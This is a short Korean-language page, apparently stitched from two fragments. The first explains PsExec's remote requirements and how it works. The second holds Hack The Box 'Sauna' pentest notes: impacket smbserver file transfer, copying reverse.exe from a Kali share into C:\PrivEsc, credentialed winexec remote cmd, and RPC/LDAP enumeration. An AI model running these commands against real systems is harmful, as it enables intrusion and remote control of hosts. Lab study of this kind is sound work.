Elbrown

PSExec 유틸리티는 원격 시스템에 몇 가지 사항이 필요합니다. SMB (서버 메시지 블록) 서비스를 사용할 수 있고 연결할 수 있어야합니다 (예 : 방화벽에 의해 차단되지 않아야 함). 파일 및 인쇄 공유를 활성화해야합니다. 및 단순 파일 공유를 비활성화해야합니다. Admin$ 공유가 사용 가능하고 액세스 가능해야합니다. Windows 디렉터리에 매핑되는 숨겨진 SMB 공유는 소프트웨어 배포를위한 것입니다. PSExec 유틸리티에 제공된 자격 증명에는 Admin$ 공유에 액세스 할 수있는 권한이 있어야합니다. PSExec에는 실행 파일 내에 Windows 서비스 이미지가 있습니다. 이 서비스를 가져와 원격 시스템의 Admin$ 공유에 배포합니다. 그런 다음 SMB를 통한 DCE / RPC 인터페이스를..

sed 치환 명령어 빈칸을 제거함 sed 's/ //g' id_rsa> rsa Windows-Kali smbserver 파일전송 칼리 python /tools/tmp/impacket/examples/smbserver.py kali . 타겟 copy \칼리IP\kali\reverse.exe C:\PrivEsc\reverse.exe winexec, psexec (칼리에서 원격 cmd 실행) winexec -U 사용자%암호 //아이피 cmd Enumeration MSRPC & LDAP(Credential을 가지고 있어야 깊게 진행 가능..) msrpc root@kali:/HTB/Sauna# rpcdump.py 10.10.10.175 -p 135 ldap nmap brute 제외하고 ldap 관련 스크립트 모두..